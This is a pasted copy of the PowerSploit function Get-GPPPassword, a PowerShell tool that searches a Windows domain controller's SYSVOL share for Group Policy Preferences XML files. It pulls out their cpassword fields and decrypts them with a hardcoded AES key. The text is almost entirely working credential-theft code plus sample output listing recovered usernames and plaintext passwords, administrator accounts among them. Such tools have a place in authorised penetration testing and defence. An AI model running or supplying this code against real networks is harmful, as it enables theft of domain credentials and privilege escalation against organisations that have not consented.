wow

1. function Get-GPPPassword {
2. <#
3. .SYNOPSIS
4.  
5. Retrieves the plaintext password and other information for accounts pushed through Group Policy Preferences.
6.  
7. PowerSploit Function: Get-GPPPassword
8. Author: Chris Campbell (@obscuresec)
9. License: BSD 3-Clause
10. Required Dependencies: None
11. Optional Dependencies: None
12.  
13. .DESCRIPTION
14.  
15. Get-GPPPassword searches a domain controller for groups.xml, scheduledtasks.xml, services.xml and datasources.xml and returns plaintext passwords.
16.  
17. .PARAMETER Server
18.  
19. Specify the domain controller to search for.
20. Default's to the users current domain
21.  
22. .EXAMPLE
23.  
24. PS C:\> Get-GPPPassword
25.  
26. NewName : [BLANK]
27. Changed : {2014-02-21 05:28:53}
28. Passwords : {password12}
29. UserNames : {test1}
30. File : \\DEMO.LAB\SYSVOL\demo.lab\Policies\{31B2F340-016D-11D2-945F-00C04FB984F9}\MACHINE\Preferences\DataSources\DataSources.xml
31.  
32. NewName : {mspresenters}
33. Changed : {2013-07-02 05:43:21, 2014-02-21 03:33:07, 2014-02-21 03:33:48}
34. Passwords : {Recycling*3ftw!, password123, password1234}
35. UserNames : {Administrator (built-in), DummyAccount, dummy2}
36. File : \\DEMO.LAB\SYSVOL\demo.lab\Policies\{31B2F340-016D-11D2-945F-00C04FB984F9}\MACHINE\Preferences\Groups\Groups.xml
37.  
38. NewName : [BLANK]
39. Changed : {2014-02-21 05:29:53, 2014-02-21 05:29:52}
40. Passwords : {password, password1234$}
41. UserNames : {administrator, admin}
42. File : \\DEMO.LAB\SYSVOL\demo.lab\Policies\{31B2F340-016D-11D2-945F-00C04FB984F9}\MACHINE\Preferences\ScheduledTasks\ScheduledTasks.xml
43.  
44. NewName : [BLANK]
45. Changed : {2014-02-21 05:30:14, 2014-02-21 05:30:36}
46. Passwords : {password, read123}
47. UserNames : {DEMO\Administrator, admin}
48. File : \\DEMO.LAB\SYSVOL\demo.lab\Policies\{31B2F340-016D-11D2-945F-00C04FB984F9}\MACHINE\Preferences\Services\Services.xml
49.  
50. .EXAMPLE
51. PS C:\> Get-GPPPassword -Server EXAMPLE.COM
52.  
53. NewName : [BLANK]
54. Changed : {2014-02-21 05:28:53}
55. Passwords : {password12}
56. UserNames : {test1}
57. File : \\EXAMPLE.COM\SYSVOL\demo.lab\Policies\{31B2F340-016D-11D2-945F-00C04FB982DA}\MACHINE\Preferences\DataSources\DataSources.xml
58.  
59. NewName : {mspresenters}
60. Changed : {2013-07-02 05:43:21, 2014-02-21 03:33:07, 2014-02-21 03:33:48}
61. Passwords : {Recycling*3ftw!, password123, password1234}
62. UserNames : {Administrator (built-in), DummyAccount, dummy2}
63. File : \\EXAMPLE.COM\SYSVOL\demo.lab\Policies\{31B2F340-016D-11D2-945F-00C04FB9AB12}\MACHINE\Preferences\Groups\Groups.xml
64.  
65. .EXAMPLE
66.  
67. PS C:\> Get-GPPPassword | ForEach-Object {$_.passwords} | Sort-Object -Uniq
68.  
69. password
70. password12
71. password123
72. password1234
73. password1234$
74. read123
75. Recycling*3ftw!
76.  
77. .LINK
78.  
79. http://www.obscuresecurity.blogspot.com/2012/05/gpp-password-retrieval-with-powershell.html
80. https://github.com/mattifestation/PowerSploit/blob/master/Recon/Get-GPPPassword.ps1
81. http://esec-pentest.sogeti.com/exploiting-windows-2008-group-policy-preferences
82. http://rewtdance.blogspot.com/2012/06/exploiting-windows-2008-group-policy.html
83. #>
84.  
85. [CmdletBinding()]
86. Param (
87. [ValidateNotNullOrEmpty()]
88. [String]
89. $Server = $Env:USERDNSDOMAIN
90. )
91.  
92. #Some XML issues between versions
93. Set-StrictMode -Version 2
94.  
95. #define helper function that decodes and decrypts password
96. function Get-DecryptedCpassword {
97. [CmdletBinding()]
98. Param (
99. [string] $Cpassword
100. )
101.  
102. try {
103. #Append appropriate padding based on string length
104. $Mod = ($Cpassword.length % 4)
105.  
106. switch ($Mod) {
107. '1' {$Cpassword = $Cpassword.Substring(0,$Cpassword.Length -1)}
108. '2' {$Cpassword += ('=' * (4 - $Mod))}
109. '3' {$Cpassword += ('=' * (4 - $Mod))}
110. }
111.  
112. $Base64Decoded = [Convert]::FromBase64String($Cpassword)
113.  
114. #Create a new AES .NET Crypto Object
115. $AesObject = New-Object System.Security.Cryptography.AesCryptoServiceProvider
116. [Byte[]] $AesKey = @(0x4e,0x99,0x06,0xe8,0xfc,0xb6,0x6c,0xc9,0xfa,0xf4,0x93,0x10,0x62,0x0f,0xfe,0xe8,
117. 0xf4,0x96,0xe8,0x06,0xcc,0x05,0x79,0x90,0x20,0x9b,0x09,0xa4,0x33,0xb6,0x6c,0x1b)
118.  
119. #Set IV to all nulls to prevent dynamic generation of IV value
120. $AesIV = New-Object Byte[]($AesObject.IV.Length)
121. $AesObject.IV = $AesIV
122. $AesObject.Key = $AesKey
123. $DecryptorObject = $AesObject.CreateDecryptor()
124. [Byte[]] $OutBlock = $DecryptorObject.TransformFinalBlock($Base64Decoded, 0, $Base64Decoded.length)
125.  
126. return [System.Text.UnicodeEncoding]::Unicode.GetString($OutBlock)
127. }
128.  
129. catch {Write-Error $Error[0]}
130. }
131.  
132. #define helper function to parse fields from xml files
133. function Get-GPPInnerFields {
134. [CmdletBinding()]
135. Param (
136. $File
137. )
138.  
139. try {
140.  
141. $Filename = Split-Path $File -Leaf
142. [xml] $Xml = Get-Content ($File)
143.  
144. #declare empty arrays
145. $Cpassword = @()
146. $UserName = @()
147. $NewName = @()
148. $Changed = @()
149. $Password = @()
150.  
151. #check for password field
152. if ($Xml.innerxml -like "*cpassword*"){
153.  
154. Write-Verbose "Potential password in $File"
155.  
156. switch ($Filename) {
157.  
158. 'Groups.xml' {
159. $Cpassword += , $Xml | Select-Xml "/Groups/User/Properties/@cpassword" | Select-Object -Expand Node | ForEach-Object {$_.Value}
160. $UserName += , $Xml | Select-Xml "/Groups/User/Properties/@userName" | Select-Object -Expand Node | ForEach-Object {$_.Value}
161. $NewName += , $Xml | Select-Xml "/Groups/User/Properties/@newName" | Select-Object -Expand Node | ForEach-Object {$_.Value}
162. $Changed += , $Xml | Select-Xml "/Groups/User/@changed" | Select-Object -Expand Node | ForEach-Object {$_.Value}
163. }
164.  
165. 'Services.xml' {
166. $Cpassword += , $Xml | Select-Xml "/NTServices/NTService/Properties/@cpassword" | Select-Object -Expand Node | ForEach-Object {$_.Value}
167. $UserName += , $Xml | Select-Xml "/NTServices/NTService/Properties/@accountName" | Select-Object -Expand Node | ForEach-Object {$_.Value}
168. $Changed += , $Xml | Select-Xml "/NTServices/NTService/@changed" | Select-Object -Expand Node | ForEach-Object {$_.Value}
169. }
170.  
171. 'Scheduledtasks.xml' {
172. $Cpassword += , $Xml | Select-Xml "/ScheduledTasks/Task/Properties/@cpassword" | Select-Object -Expand Node | ForEach-Object {$_.Value}
173. $UserName += , $Xml | Select-Xml "/ScheduledTasks/Task/Properties/@runAs" | Select-Object -Expand Node | ForEach-Object {$_.Value}
174. $Changed += , $Xml | Select-Xml "/ScheduledTasks/Task/@changed" | Select-Object -Expand Node | ForEach-Object {$_.Value}
175. }
176.  
177. 'DataSources.xml' {
178. $Cpassword += , $Xml | Select-Xml "/DataSources/DataSource/Properties/@cpassword" | Select-Object -Expand Node | ForEach-Object {$_.Value}
179. $UserName += , $Xml | Select-Xml "/DataSources/DataSource/Properties/@username" | Select-Object -Expand Node | ForEach-Object {$_.Value}
180. $Changed += , $Xml | Select-Xml "/DataSources/DataSource/@changed" | Select-Object -Expand Node | ForEach-Object {$_.Value}
181. }
182.  
183. 'Printers.xml' {
184. $Cpassword += , $Xml | Select-Xml "/Printers/SharedPrinter/Properties/@cpassword" | Select-Object -Expand Node | ForEach-Object {$_.Value}
185. $UserName += , $Xml | Select-Xml "/Printers/SharedPrinter/Properties/@username" | Select-Object -Expand Node | ForEach-Object {$_.Value}
186. $Changed += , $Xml | Select-Xml "/Printers/SharedPrinter/@changed" | Select-Object -Expand Node | ForEach-Object {$_.Value}
187. }
188.  
189. 'Drives.xml' {
190. $Cpassword += , $Xml | Select-Xml "/Drives/Drive/Properties/@cpassword" | Select-Object -Expand Node | ForEach-Object {$_.Value}
191. $UserName += , $Xml | Select-Xml "/Drives/Drive/Properties/@username" | Select-Object -Expand Node | ForEach-Object {$_.Value}
192. $Changed += , $Xml | Select-Xml "/Drives/Drive/@changed" | Select-Object -Expand Node | ForEach-Object {$_.Value}
193. }
194. }
195. }
196.  
197. foreach ($Pass in $Cpassword) {
198. Write-Verbose "Decrypting $Pass"
199. $DecryptedPassword = Get-DecryptedCpassword $Pass
200. Write-Verbose "Decrypted a password of $DecryptedPassword"
201. #append any new passwords to array
202. $Password += , $DecryptedPassword
203. }
204.  
205. #put [BLANK] in variables
206. if (!($Password)) {$Password = '[BLANK]'}
207. if (!($UserName)) {$UserName = '[BLANK]'}
208. if (!($Changed)) {$Changed = '[BLANK]'}
209. if (!($NewName)) {$NewName = '[BLANK]'}
210.  
211. #Create custom object to output results
212. $ObjectProperties = @{'Passwords' = $Password;
213. 'UserNames' = $UserName;
214. 'Changed' = $Changed;
215. 'NewName' = $NewName;
216. 'File' = $File}
217.  
218. $ResultsObject = New-Object -TypeName PSObject -Property $ObjectProperties
219. Write-Verbose "The password is between {} and may be more than one value."
220. if ($ResultsObject) {Return $ResultsObject}
221. }
222.  
223. catch {Write-Error $Error[0]}
224. }
225.  
226. try {
227. #ensure that machine is domain joined and script is running as a domain account
228. if ( ( ((Get-WmiObject Win32_ComputerSystem).partofdomain) -eq $False ) -or ( -not $Env:USERDNSDOMAIN ) ) {
229. throw 'Machine is not a domain member or User is not a member of the domain.'
230. }
231.  
232. #discover potential files containing passwords ; not complaining in case of denied access to a directory
233. Write-Verbose "Searching \\$Server\SYSVOL. This could take a while."
234. $XMlFiles = Get-ChildItem -Path "\\$Server\SYSVOL" -Recurse -ErrorAction SilentlyContinue -Include 'Groups.xml','Services.xml','Scheduledtasks.xml','DataSources.xml','Printers.xml','Drives.xml'
235.  
236. if ( -not $XMlFiles ) {throw 'No preference files found.'}
237.  
238. Write-Verbose "Found $($XMLFiles | Measure-Object | Select-Object -ExpandProperty Count) files that could contain passwords."
239.  
240. foreach ($File in $XMLFiles) {
241. $Result = (Get-GppInnerFields $File.Fullname)
242. Write-Output $Result
243. }
244. }
245.  
246. catch {Write-Error $Error[0]}
247. }